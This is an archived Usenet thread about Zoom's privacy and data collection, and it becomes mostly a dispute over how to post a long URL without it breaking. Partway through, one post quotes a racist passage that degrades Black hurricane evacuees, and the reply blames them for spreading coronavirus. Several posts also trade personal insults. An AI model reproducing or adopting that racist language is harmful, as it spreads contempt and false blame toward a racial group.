<https://www.wired.co.uk/article/zoom-privacy-settings>
"Zoom has become the video-calling app of choice.
That doesn't mean it isn't slurping up your data"

The hints they provide are:
[You] "would do well to look at alternatives. Other services,
including one called Jitsi, are available, but are more complicated."

"don't say anything on a call you aren┤ happy for Zoom to data mine
and repurpose for commercial benefit"

"She recommends using a unique email alias only for Zoom, and make
sure to clear all your cookies and temporary files after each call
to limit the tracking the service can do through your browser."

"For those accessing it through a web browser, using a privacy
respecting web browser such as Brave can also limit the amount of
cookie tracking that takes place"

"The defaults for Zoom aren't just biased in favour of overly broad
data collection for the app itself, but also for the host of any call.
A call host can record a huge information by default, including your
video, any audio or text, and can even track whether you┴e paying '
attention by looking at the webcam. "
--
Usenet allows purposefully helpful sharing of facts for common benefit.

[Arlen Holder]

Zoom publicly updated its privacy policy today on its blog:
o *Zoom˘s Privacy Policy*, 3/29/2020, by Aparna Bawa, Chief Legal Officer, Zoom
<https://blog.zoom.us/wordpress/2020/03/29/zoom-privacy-policy/>
"Zoom collects... basic technical information, such as the user's IP
address, OS details, and device details..."

"When the meeting is recorded, it is, at the host's choice,
stored either locally on the host's machine or in the Zoom cloud."

"we use third-party advertising service providers (like Google) to
deliver tailored ads"

"We comply with our legal obligations. This includes responding to valid
legal process, including jurisdiction."
--
Together we can learn far more about privacy than any one of us can alone.

[Arlen Holder]

> Name just one cite that claims what you appear to have claimed, which is
> that this Zoom AdvertisingID Facebook privacy flaw exists on the Android
> Zoom app.
>
> Name just one.

I've studied these Apple Apologists like nospam always proves to be...

The permanent Usenet record will show that these strange apologists, yet
again, failed the simplest 3-word test all bullshitters like nospam fail:
o Name just one

Which proves, yet again...
o Apologists' _entire_ belief systems are based on exactly zero (0) facts.
--
The weakness of all bullshitters are facts, which is why nospam brazeny
denies facts out of hand ... where - literally - facts scare apologists.

[m-m]

Here's the unbroken link:

https://appleinsider.com/articles/20/03/26/zoom-for-ios-shares-data-with-
facebook-even-if-users-dont-have-an-account







In article <5f915f4b87497f8d...@dizum.com>, collector

<no...@anon.info> wrote:

> It's enough to have their app on smartphone without even using
> it.
>
> https://appleinsider.com/articles/20/03/26/zoom-for-ios-shares-
> data-with-facebook-even-if-users-dont-have-an-account
>

--
m-m
www.mhmyers.com

[nospam]

In article <020420202127032945%nosp...@nym.ore>, m-m

<nosp...@nym.ore> wrote:

> Here's the unbroken link:
>
> https://appleinsider.com/articles/20/03/26/zoom-for-ios-shares-data-with-
> facebook-even-if-users-dont-have-an-account

that is a broken link.

the correct way is to use <> delimiters, and then it doesn't matter if
there are embedded line breaks or white space.

[Snit]

On 4/2/20 6:30 PM, nospam wrote:
> In article <020420202127032945%nosp...@nym.ore>, m-m
> <nosp...@nym.ore> wrote:
>
>> Here's the unbroken link:
>>
>> https://appleinsider.com/articles/20/03/26/zoom-for-ios-shares-data-with-
>> facebook-even-if-users-dont-have-an-account
>
> that is a broken link.

It says:

------
Zoom for iOS shares data with Facebook even if users don't have an account
------

This might work better for you: https://bit.ly/39FEmJl

> the correct way is to use <> delimiters, and then it doesn't matter if
> there are embedded line breaks or white space.
>

--
Personal attacks from those who troll show their own insecurity. They
cannot use reason to show the message to be wrong so they try to feel
somehow superior by attacking the messenger.

They cling to their attacks and ignore the message time and time again.

[Bob F]

On 3/31/2020 4:58 AM, chrisv wrote:
> "ABC News last night led with stories about the black morons. Now
> that they've dispersed, New Orleans is safe (only 1 murder in 3
> months), but the cities that took their stinking, thieving, lazy,
> criminal asses in are experiencing crime waves. It was truly
> disturbing to see the fat she-beasts with 6 kids living in a nice
> FEMA-paid-for hotel (that they're about to be evicted from - finally!)
> talking about 'dey needs a place to stay wif dere chirren'" - DFS

What they spread all over the nation was Coronavirus.

[Paul]

m-m wrote:
> Here's the unbroken link:
>
> https://appleinsider.com/articles/20/03/26/zoom-for-ios-shares-data-with-
> facebook-even-if-users-dont-have-an-account
>

Um, try changing the line wrap setting on your client.
That's why this one is "broken".

I set my line wrap to an absurdly large number, so it
doesn't interfere with my fun.

https://appleinsider.com/articles/20/03/26/zoom-for-ios-shares-data-with-facebook-even-if-users-dont-have-an-account

Paul

[nospam]

In article <qkkd8f1vopocb1cd8...@4ax.com>, Mitch
<m....@mixnym.net> wrote:

> On Thu, 02 Apr 2020 21:27:03 -0400, m-m <nosp...@nym.ore> wrote:
>
> >Here's the unbroken link:
> >
> >https://appleinsider.com/articles/20/03/26/zoom-for-ios-shares-data-with-
> >facebook-even-if-users-dont-have-an-account
>
>
>

> <https://appleinsider.com/articles/20/03/26/zoom-for-ios-shares-data-with-face
> book-even-if-users-dont-have-an-account>

correct.

[nospam]

In article <henjfp...@mid.individual.net>, Snit

<use...@gallopinginsanity.com> wrote:

> >> Here's the unbroken link:
> >>
> >> https://appleinsider.com/articles/20/03/26/zoom-for-ios-shares-data-with-
> >> facebook-even-if-users-dont-have-an-account
> >
> > that is a broken link.
>
> It says:
>
> ------
> Zoom for iOS shares data with Facebook even if users don't have an account
> ------

i know quite well what it says. another failed attempt at moving the
goalpost.

he claimed the link was unbroken. that is false. it's broken. very
simple.

> This might work better for you: https://bit.ly/39FEmJl

another goalpost movement fail. nowhere did i say i was having any
problem with the link, nor is that a solution since there is no need
for url shorteners in a venue that is not space-constrained, such as
usenet.

url shorteners are a bad idea and best avoided. not only do they hide
the target, but they also risk redirecting to an undesirable site, one
of several reasons why they are on numerous blocklists. they are also
fragile and are often used to track users.

> > the correct way is to use <> delimiters, and then it doesn't matter if
> > there are embedded line breaks or white space.

i see you completely ignored this part.

[Mayayana]

"Paul" <nos...@needed.invalid> wrote

| I set my line wrap to an absurdly large number, so it
| doesn't interfere with my fun.
|
|
https://appleinsider.com/articles/20/03/26/zoom-for-ios-shares-data-with-facebook-even-if-users-dont-have-an-account
|

It's also worth noting that the Facebook issue was
2 problems ago. Zoom turns out to be a uniquely
messed up product:

https://www.nytimes.com/2020/04/02/technology/zoom-linkedin-data.html

I also don't see anything resembling settings in the
UI.

[m-m]

Thanks, Paul. I unchecked "Wrap Messages"

I'll try again just to test:

https://appleinsider.com/articles/20/03/26/zoom-for-ios-shares-data-with-facebook-even-if-users-dont-have-an-account

--
m-m
www.mhmyers.com

[nospam]

In article <030420200902319777%nosp...@nym.ore>, m-m

<nosp...@nym.ore> wrote:

> Thanks, Paul. I unchecked "Wrap Messages"
>
> I'll try again just to test:
>
>
> https://appleinsider.com/articles/20/03/26/zoom-for-ios-shares-data-with-faceb
> ook-even-if-users-dont-have-an-account
>

still broken.

use <> delimiters which avoids embedded whitespace from being an issue:
<https://appleinsider.com/articles/20/03/26/zoom-for-ios-shares-data-wit
h-facebook-even-if-users-dont-have-an-account>

[Paul]

Now, it's all one line. Good.

http://al.howardknight.net/?STYPE=msgid&MSGI=%3C030420200902319777%25nospam-m%40nym.ore%3E

You can see the wrap in the original one.

http://al.howardknight.net/?STYPE=msgid&MSGI=%3C020420202127032945%25nospam-m%40nym.ore%3E

Plug the MID in here, to review what the
message looks like as a text file (after
it's sent and floating about in USENET).

http://al.howardknight.net/

Paul

[Andy Burns]

m-m wrote:

> I'll try again just to test:
>
> https://appleinsider.com/articles/20/03/26/zoom-for-ios-shares-data-with-facebook-even-if-users-dont-have-an-account

That's better

[Andy Burns]

nospam wrote:

> m-m wrote:
>
>> Thanks, Paul. I unchecked "Wrap Messages"
>>
>> I'll try again just to test:
>>
>> https://appleinsider.com/articles/20/03/26/zoom-for-ios-shares-data-with-faceb
>> ook-even-if-users-dont-have-an-account
>
> still broken.

it was fine, until you replied to it, which wrapped it (though perhaps
your client wouldn't have done that if it had been enclosed in < >

[nospam]

In article <heorbq...@mid.individual.net>, Andy Burns

<use...@andyburns.uk> wrote:

> >>
> >> I'll try again just to test:
> >>
> >>
> >> https://appleinsider.com/articles/20/03/26/zoom-for-ios-shares-data-with-fa
> >> ceb
> >> ook-even-if-users-dont-have-an-account
> >
> > still broken.
>
> it was fine, until you replied to it, which wrapped it (though perhaps
> your client wouldn't have done that if it had been enclosed in < >

there is no way to control what happens after posting, which is why <>
is so important.

[chrisv]

Exactly.

Here it is, fixed again:

https://appleinsider.com/articles/20/03/26/zoom-for-ios-shares-data-with-facebook-even-if-users-dont-have-an-account

--
"One of the screenshot apps in Linux allows you to upload only to
imgur. Should I whine and demand to be able to upload to any of 8
different image hosting sites?" - DumFSck

[nospam]

In article <3aee8ftkaoo8se66d...@4ax.com>, chrisv

<chr...@nospam.invalid> wrote:


> >>> I'll try again just to test:
> >>>
> >>>
> >>> https://appleinsider.com/articles/20/03/26/zoom-for-ios-shares-data-with-f
> >>> aceb
> >>> ook-even-if-users-dont-have-an-account
> >>
> >> still broken.
> >
> >it was fine, until you replied to it, which wrapped it (though perhaps
> >your client wouldn't have done that if it had been enclosed in < >
>
> Exactly.
>
> Here it is, fixed again:
>
> https://appleinsider.com/articles/20/03/26/zoom-for-ios-shares-data-with-facebook-even-if-users-dont-have-an-account

that one doesn't break, however, it's still missing <> delimiters

[Arlen Holder]

In response to what nospam <nos...@nospam.invalid> wrote :

> that one doesn't break, however, it's still missing <> delimiters

Also in response to what Paul <nos...@needed.invalid> wrote :
> https://appleinsider.com/articles/20/03/26/zoom-for-ios-shares-data-with-facebook-even-if-users-dont-have-an-account

1. Regarding the broken links, here's what I see on my setup:
a. nospam's first link was broken
b. m-m's first link was broken
c. Paul's first link was not broken (using line wrap settings)
d. m-m's second link was not broken (using line wrap settings)
e. nospam's second link was still broken (even with delimiters)
f. chrisv's link was not broken (even without delimiters)
g. Paul's howardknight links are not broken (even without delimiters)
h. Mitch's link is not broken (using delimiters)

2. In summary, the only one whose links were always broken were those from:
a. nospam's first link was broken
e. nospam's second link was still broken (even with delimiters)

3. Here are four ways for me to post that same link:
a. delimited, not wrapped (i.e., line length set to infinity)
b. delimited, wrapped (i.e., line length set to the default)
c. not delimited, not wrapped
d. not delimited, wrapped

First set, delimited: first unwrapped, and then allowed to wrap:
<https://appleinsider.com/articles/20/03/26/zoom-for-ios-shares-data-with-facebook-even-if-users-dont-have-an-account>
<https://appleinsider.com/articles/20/03/26/zoom-for-ios-shares-data-with-facebook-even-if-users-dont-have-an-account>

First set, not delimited: first unwrapped, and then allowed to wrap:
https://appleinsider.com/articles/20/03/26/zoom-for-ios-shares-data-with-facebook-even-if-users-dont-have-an-account
https://appleinsider.com/articles/20/03/26/zoom-for-ios-shares-data-with-facebook-even-if-users-dont-have-an-account

I suspect that last link may be broken by the time you get it; where I hope
the first two links are not broken by the time you get it. I'm not sure
what will happen to the third link as it was unwrapped on my end but not
delimited.

[John McWilliams]

Much.